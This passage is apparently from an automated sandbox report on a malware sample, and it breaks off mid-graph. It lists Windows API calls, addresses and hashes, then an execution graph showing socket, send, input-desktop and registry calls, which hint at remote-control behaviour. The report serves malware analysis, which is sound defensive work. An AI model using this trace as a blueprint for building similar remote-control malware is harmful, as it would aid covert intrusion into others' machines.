                                                      • ScreenToClient.USER32(?,?), ref: 004085B0
                                                      • GetClientRect.USER32(?,?), ref: 004085C2
                                                      • PtInRect.USER32(?,?,?), ref: 004085D1
                                                        • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                      • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ClientRect$CallHookKillNextScreenTimer
                                                      • String ID:
                                                      • API String ID: 3015594791-0
                                                      • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                      • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                      • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                      • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                      APIs
                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                      • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@TextWindow$Length
                                                      • String ID:
                                                      • API String ID: 2308334395-0
                                                      • Opcode ID: 64821f724eaf75f8595ea9ceaa2a55033291bc09f7450cc00c986bb895f50aef
                                                      • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                      • Opcode Fuzzy Hash: 64821f724eaf75f8595ea9ceaa2a55033291bc09f7450cc00c986bb895f50aef
                                                      • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                      APIs
                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                      • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: CreateFontIndirectItemMessageObjectSend
                                                      • String ID:
                                                      • API String ID: 2001801573-0
                                                      • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                      • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                      • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                      • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00401D92
                                                      • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ClientScreen$ParentRectWindow
                                                      • String ID:
                                                      • API String ID: 2099118873-0
                                                      • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                      • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                      • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                      • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: (nA${D@
                                                      • API String ID: 613200358-2741945119
                                                      • Opcode ID: 6b06a11e73f06e76f4a00552280f2f7e1c7ff29664b4032982e0d2416b01d521
                                                      • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                      • Opcode Fuzzy Hash: 6b06a11e73f06e76f4a00552280f2f7e1c7ff29664b4032982e0d2416b01d521
                                                      • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                      APIs
                                                        • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                        • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                        • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                        • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@$??3@$memmove
                                                      • String ID: {D@
                                                      • API String ID: 4294387087-1160549682
                                                      • Opcode ID: 97954ea42f8a4878ba2de2a8ca68f1b83589843b80685a5ba565dc0455dd78ce
                                                      • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                      • Opcode Fuzzy Hash: 97954ea42f8a4878ba2de2a8ca68f1b83589843b80685a5ba565dc0455dd78ce
                                                      • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: _wtol
                                                      • String ID: GUIFlags$^L@
                                                      • API String ID: 2131799477-2609156739
                                                      • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                      • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                      • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                      • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@wsprintf
                                                      • String ID: (%d%s)
                                                      • API String ID: 3815514257-2087557067
                                                      • Opcode ID: 5f25024aef255d6e4feb710b233e5bb73948a93cc78658359bfd90e81bb857a7
                                                      • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                      • Opcode Fuzzy Hash: 5f25024aef255d6e4feb710b233e5bb73948a93cc78658359bfd90e81bb857a7
                                                      • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                      • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: TextWindow$Length
                                                      • String ID: t1@
                                                      • API String ID: 1006428111-473456572
                                                      • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                      • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                      • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                      • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                      APIs
                                                      • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: 7-Zip SFX$Could not allocate memory
                                                      • API String ID: 2030045667-3806377612
                                                      • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                      • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                      • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                      • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                      Execution Graph

                                                      Execution Coverage:3.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:10.6%
                                                      Total number of Nodes:1045
                                                      Total number of Limit Nodes:47
                                                      execution_graph 23130 7ff790c379e9 75 API calls 3 library calls 23131 7ff790c365f1 8 API calls _getdrive 23132 7ff790c403f0 CombineRgn 23134 7ff790c5ebf0 141 API calls 2 library calls 23135 7ff790c5dbf0 13 API calls _RunAllParam 23138 7ff790c409e0 82 API calls 2 library calls 23139 7ff790c43be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 23140 7ff790c589e0 93 API calls _RunAllParam 23141 7ff790c4dde0 152 API calls 23144 7ff790c43210 18 API calls _getdrive 23145 7ff790c44c10 137 API calls 4 library calls 23148 7ff790c40010 74 API calls free 22786 7ff790c4e610 22787 7ff790ce92a4 __wtomb_environ 70 API calls 22786->22787 22788 7ff790c4e67f CreateRectRgn 22787->22788 22789 7ff790ce92a4 __wtomb_environ 70 API calls 22788->22789 22790 7ff790c4e6a3 CreateRectRgn 22789->22790 22791 7ff790ce92a4 __wtomb_environ 70 API calls 22790->22791 22792 7ff790c4e6c7 CreateRectRgn 22791->22792 22793 7ff790c33730 _RunAllParam 89 API calls 22792->22793 22833 7ff790c4e70a _RunAllParam 22793->22833 22794 7ff790c4f70d 22795 7ff790c33730 _RunAllParam 89 API calls 22794->22795 22796 7ff790c4f725 22795->22796 22798 7ff790c33730 _RunAllParam 89 API calls 22796->22798 22797 7ff790c4e740 Sleep 22799 7ff790c4e752 22797->22799 22801 7ff790c4f741 DeleteObject 22798->22801 22799->22797 22799->22833 22837 7ff790c4f6b8 SetRectRgn 22799->22837 22843 7ff790c4f6da LeaveCriticalSection Sleep 22799->22843 22800 7ff790c4e773 EnterCriticalSection 22800->22833 22802 7ff790ce8bf4 free 70 API calls 22801->22802 22803 7ff790c4f760 DeleteObject 22802->22803 22804 7ff790ce8bf4 free 70 API calls 22803->22804 22805 7ff790c4f773 DeleteObject 22804->22805 22807 7ff790ce8bf4 free 70 API calls 22805->22807 22806 7ff790c4eab4 DeleteObject 22808 7ff790ce8bf4 free 70 API calls 22806->22808 22813 7ff790c4f786 22807->22813 22808->22833 22809 7ff790c4ead7 DeleteObject 22814 7ff790ce8bf4 free 70 API calls 22809->22814 22810 7ff790c4e8cb DeleteObject 22815 7ff790ce8bf4 free 70 API calls 22810->22815 22811 7ff790c4e8ee DeleteObject 22818 7ff790ce8bf4 free 70 API calls 22811->22818 22821 7ff790ce7220 _getdrive 8 API calls 22813->22821 22814->22833 22815->22833 22816 7ff790c4eafa DeleteObject 22817 7ff790ce8bf4 free 70 API calls 22816->22817 22817->22833 22818->22833 22819 7ff790c4e9a6 GetRgnBox 22819->22833 22820 7ff790c4e911 DeleteObject 22824 7ff790ce8bf4 free 70 API calls 22820->22824 22825 7ff790c4f7a2 22821->22825 22823 7ff790cc75c0 104 API calls 22823->22833 22824->22833 22826 7ff790c4e7e6 GetRgnBox 22826->22833 22827 7ff790c4f704 LeaveCriticalSection 22827->22794 22829 7ff790cc7400 97 API calls 22829->22833 22830 7ff790c4e9f3 GetRgnBox 22830->22833 22832 7ff790c4e833 GetRgnBox 22832->22833 22833->22794 22833->22797 22833->22799 22833->22800 22833->22806 22833->22809 22833->22810 22833->22811 22833->22816 22833->22820 22833->22823 22833->22827 22833->22829 22835 7ff790ce92a4 __wtomb_environ 70 API calls 22833->22835 22836 7ff790c9d440 16 API calls 22833->22836 22833->22837 22844 7ff790ce92a4 __wtomb_environ 70 API calls 22833->22844 22847 7ff790c4f60b GetTickCount 22833->22847 22849 7ff790ce92a4 __wtomb_environ 70 API calls 22833->22849 22850 7ff790c33730 89 API calls _RunAllParam 22833->22850 22861 7ff790c9d710 15 API calls 22833->22861 22862 7ff790c9cc40 91 API calls 22833->22862 22863 7ff790c3f840 73 API calls __wtomb_environ 22833->22863 22864 7ff790c3f840 73 API calls __wtomb_environ 22833->22864 22865 7ff790c3f840 73 API calls __wtomb_environ 22833->22865 22866 7ff790c3f840 73 API calls __wtomb_environ 22833->22866 22867 7ff790c3f840 73 API calls __wtomb_environ 22833->22867 22868 7ff790c3f840 73 API calls __wtomb_environ 22833->22868 22870 7ff790c9d600 14 API calls 22833->22870 22879 7ff790c9ded0 8 API calls 2 library calls 22833->22879 22880 7ff790c5a580 99 API calls _RunAllParam 22833->22880 22840 7ff790c4ebb3 CreateRectRgn CombineRgn 22835->22840 22836->22833 22837->22843 22839 7ff790c4ea40 GetRgnBox 22839->22833 22846 7ff790c4ec05 22840->22846 22842 7ff790c4e87c GetRgnBox 22842->22833 22843->22833 22845 7ff790c4f702 22843->22845 22848 7ff790c4efdf CreateRectRgn CombineRgn DeleteObject 22844->22848 22845->22794 22851 7ff790c4ec20 SetEvent 22846->22851 22869 7ff790c58e00 120 API calls 22846->22869 22871 7ff790c9dd90 22847->22871 22854 7ff790ce8bf4 free 70 API calls 22848->22854 22855 7ff790c4f120 CreateRectRgn CombineRgn DeleteObject 22849->22855 22850->22833 22851->22846 22854->22833 22858 7ff790ce8bf4 free 70 API calls 22855->22858 22856 7ff790c4ec4a DeleteObject 22859 7ff790ce8bf4 free 70 API calls 22856->22859 22858->22833 22859->22833 22861->22833 22862->22833 22863->22826 22864->22832 22865->22842 22866->22819 22867->22830 22868->22839 22869->22856 22870->22833 22875 7ff790c9de3d 22871->22875 22878 7ff790c9ddd4 22871->22878 22872 7ff790c9ddf0 select 22872->22878 22873 7ff790ce7220 _getdrive 8 API calls 22874 7ff790c9dea6 22873->22874 22874->22799 22875->22873 22876 7ff790c9de55 __WSAFDIsSet 22877 7ff790c9de67 send 22876->22877 22876->22878 22877->22878 22878->22872 22878->22875 22878->22876 22879->22833 22880->22833 23150 7ff790c4da10 82 API calls 2 library calls 23151 7ff790c87e10 20 API calls _getdrive 23156 7ff790c3a600 100 API calls _RunAllParam 23157 7ff790c40e00 82 API calls 3 library calls 23160 7ff790c34200 121 API calls 2 library calls 23161 7ff790c31000 70 API calls free 23162 7ff790c63600 9 API calls _getdrive 23163 7ff790c65000 71 API calls free 23165 7ff790c45203 16 API calls _getdrive 23166 7ff790c381ad 272 API calls 2 library calls 23168 7ff790c3ffb0 SetRectRgn SetRectRgn SetRectRgn 23169 7ff790c5a9b0 114 API calls _getdrive 23170 7ff790c5ebb0 71 API calls 23171 7ff790c505b0 168 API calls _RunAllParam 23173 7ff790c54003 246 API calls 3 library calls 23174 7ff790c613a0 7 API calls 23175 7ff790c49ba0 SetEvent Sleep Sleep 23180 7ff790c41bd0 FreeLibrary 23181 7ff790c3f7d0 DeleteObject 23182 7ff790c355d0 72 API calls sprintf 22881 7ff790c4f7d0 22882 7ff790c4f80d 22881->22882 22883 7ff790c4f803 22881->22883 22890 7ff790cc7a70 6 API calls 22882->22890 22887 7ff790c584f0 22883->22887 22891 7ff790c58590 22887->22891 22892 7ff790c33730 _RunAllParam 89 API calls 22891->22892 22893 7ff790c585d2 22892->22893 22894 7ff790c58628 22893->22894 22895 7ff790c585eb SendMessageA WaitForSingleObject 22893->22895 22896 7ff790c58612 22893->22896 22897 7ff790c58656 22894->22897 22898 7ff790ce8bf4 free 70 API calls 22894->22898 22895->22896 22896->22894 22921 7ff790c44110 22896->22921 22899 7ff790c33730 _RunAllParam 89 API calls 22897->22899 22908 7ff790c5867e _RunAllParam 22897->22908 22898->22897 22899->22908 22900 7ff790c58757 22901 7ff790c58768 22900->22901 22902 7ff790ce8bf4 free 70 API calls 22900->22902 22903 7ff790c58779 22901->22903 22904 7ff790ce8bf4 free 70 API calls 22901->22904 22902->22901 22906 7ff790c587b5 FreeLibrary 22903->22906 22911 7ff790c587bc _RunAllParam 22903->22911 22904->22903 22906->22911 22907 7ff790c5873b 22907->22900 22909 7ff790c58740 SendMessageA 22907->22909 22908->22900 22924 7ff790c9a220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22908->22924 22909->22900 22910 7ff790c587ea DeleteObject 22912 7ff790ce8bf4 free 70 API calls 22910->22912 22911->22910 22913 7ff790c5881c DeleteObject 22912->22913 22914 7ff790ce8bf4 free 70 API calls 22913->22914 22915 7ff790c58844 DeleteObject 22914->22915 22916 7ff790ce8bf4 free 70 API calls 22915->22916 22917 7ff790c5885d DeleteObject 22916->22917 22918 7ff790ce8bf4 free 70 API calls 22917->22918 22919 7ff790c58876 22918->22919 22925 7ff790c44140 22921->22925 22923 7ff790c44124 22923->22894 22924->22907 22926 7ff790c4415c _RunAllParam 22925->22926 22927 7ff790c441c6 22926->22927 22928 7ff790c441b4 SendMessageA 22926->22928 22929 7ff790c441cf FreeLibrary 22927->22929 22930 7ff790c441d5 22927->22930 22928->22927 22929->22930 22930->22923 23183 7ff790c4b3d0 96 API calls 2 library calls 23184 7ff790c87bd0 21 API calls _getdrive 23185 7ff790c54003 209 API calls 2 library calls 21987 7ff790c9cbc0 21988 7ff790c9cbd7 21987->21988 21989 7ff790c9cbdc socket 21987->21989 22005 7ff790c9cc40 21988->22005 21991 7ff790c9cbf3 21989->21991 21992 7ff790c9cbfb setsockopt 21989->21992 21992->21991 21993 7ff790c9cc20 21992->21993 21996 7ff790c9cf90 setsockopt 21993->21996 21997 7ff790c9d08a getsockname getpeername 21996->21997 21998 7ff790c9cff9 setsockopt 21996->21998 22001 7ff790c9d109 SetPerTcpConnectionEStats 21997->22001 22002 7ff790c9d137 21997->22002 21999 7ff790c9d022 WSAIoctl 21998->21999 22000 7ff790c9d01d 21998->22000 21999->21997 22000->21997 22001->22002 22010 7ff790ce7220 22002->22010 22004 7ff790c9cc28 22006 7ff790c9cc4f 22005->22006 22007 7ff790c9cc87 22005->22007 22022 7ff790c33730 22006->22022 22007->21989 22012 7ff790ce7229 22010->22012 22011 7ff790ce7234 22011->22004 22012->22011 22013 7ff790cf29e4 RtlCaptureContext RtlLookupFunctionEntry 22012->22013 22014 7ff790cf2a69 22013->22014 22015 7ff790cf2a28 RtlVirtualUnwind 22013->22015 22016 7ff790cf2a8b IsDebuggerPresent 22014->22016 22015->22016 22021 7ff790cfdc94 22016->22021 22018 7ff790cf2aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22019 7ff790cf2b12 GetCurrentProcess TerminateProcess 22018->22019 22020 7ff790cf2b08 _getdrive 22018->22020 22019->22004 22020->22019 22021->22018 22023 7ff790c33765 shutdown closesocket 22022->22023 22024 7ff790c33746 22022->22024 22023->22007 22024->22023 22026 7ff790c83740 89 API calls 3 library calls 22024->22026 22026->22023 23186 7ff790c54003 239 API calls 2 library calls 23187 7ff790c54003 228 API calls 3 library calls 23189 7ff790cee9bc 81 API calls 3 library calls 23190 7ff790c355c0 LeaveCriticalSection 23191 7ff790c347c0 12 API calls 23197 7ff790c44970 97 API calls 2 library calls 23198 7ff790c40b70 89 API calls 23199 7ff790c3ab70 95 API calls _RunAllParam 23201 7ff790c33770 111 API calls 2 library calls 23203 7ff790c42b5e 87 API calls 22419 7ff790c55958 22420 7ff790c5596d 22419->22420 22421 7ff790c55981 22420->22421 22491 7ff790c5c2c0 22420->22491 22423 7ff790c5597e 22421->22423 22423->22421 22424 7ff790c5599d EnterCriticalSection 22423->22424 22532 7ff790c9d890 97 API calls _RunAllParam 22424->22532 22426 7ff790c559e2 22427 7ff790c57b2e 22426->22427 22428 7ff790c57afe FlushFileBuffers 22426->22428 22457 7ff790c54003 22426->22457 22431 7ff790c57b4e FlushFileBuffers 22427->22431 22427->22457 22534 7ff790c9dfc0 CloseHandle 22428->22534 22429 7ff790c57b99 LeaveCriticalSection 22429->22457 22535 7ff790c9dfc0 CloseHandle 22431->22535 22434 7ff790c57c95 22436 7ff790c57cf7 22434->22436 22437 7ff790c57ca6 FlushFileBuffers 22434->22437 22435 7ff790c57c81 Sleep 22435->22434 22439 7ff790c57d08 FlushFileBuffers 22436->22439 22440 7ff790c57d59 22436->22440 22437->22436 22438 7ff790c57ce6 CloseHandle 22437->22438 22438->22436 22439->22440 22441 7ff790c57d48 CloseHandle 22439->22441 22537 7ff790c9a3b0 93 API calls 2 library calls 22440->22537 22441->22440 22444 7ff790c57d62 22445 7ff790c57d85 22444->22445 22538 7ff790c62170 16 API calls 22444->22538 22448 7ff790c57dbc 22445->22448 22449 7ff790c57d9d CloseDesktop 22445->22449 22446 7ff790c62220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22446->22457 22456 7ff790c33730 _RunAllParam 89 API calls 22448->22456 22449->22448 22450 7ff790c57da7 22449->22450 22451 7ff790c33730 _RunAllParam 89 API calls 22450->22451 22451->22448 22453 7ff790c531b0 27 API calls 22453->22457 22454 7ff790c33730 89 API calls _RunAllParam 22454->22457 22455 7ff790c5c590 16 API calls 22455->22457 22459 7ff790c57dfc GetModuleFileNameA 22456->22459 22457->22429 22457->22446 22457->22453 22457->22454 22457->22455 22458 7ff790c33730 _RunAllParam 89 API calls 22457->22458 22461 7ff790c5419d GetTickCount 22457->22461 22466 7ff790c9d440 16 API calls 22457->22466 22467 7ff790c9d890 97 API calls 22457->22467 22475 7ff790c57c72 22457->22475 22478 7ff790c57c47 CloseDesktop 22457->22478 22480 7ff790c9d170 2 API calls 22457->22480 22481 7ff790c540bf CloseDesktop 22457->22481 22528 7ff790c9a5b0 98 API calls 2 library calls 22457->22528 22529 7ff790c9a3b0 93 API calls 2 library calls 22457->22529 22530 7ff790c995d0 EnterCriticalSection LeaveCriticalSection 22457->22530 22531 7ff790c5c6f0 18 API calls _RunAllParam 22457->22531 22533 7ff790c5b1f0 97 API calls _vsnprintf_l 22457->22533 22536 7ff790c5c4e0 93 API calls _RunAllParam 22457->22536 22462 7ff790c54075 OpenInputDesktop 22458->22462 22463 7ff790c57e15 22459->22463 22464 7ff790c57e56 LoadLibraryA 22459->22464 22461->22457 22462->22457 22465 7ff790c57c54 22462->22465 22539 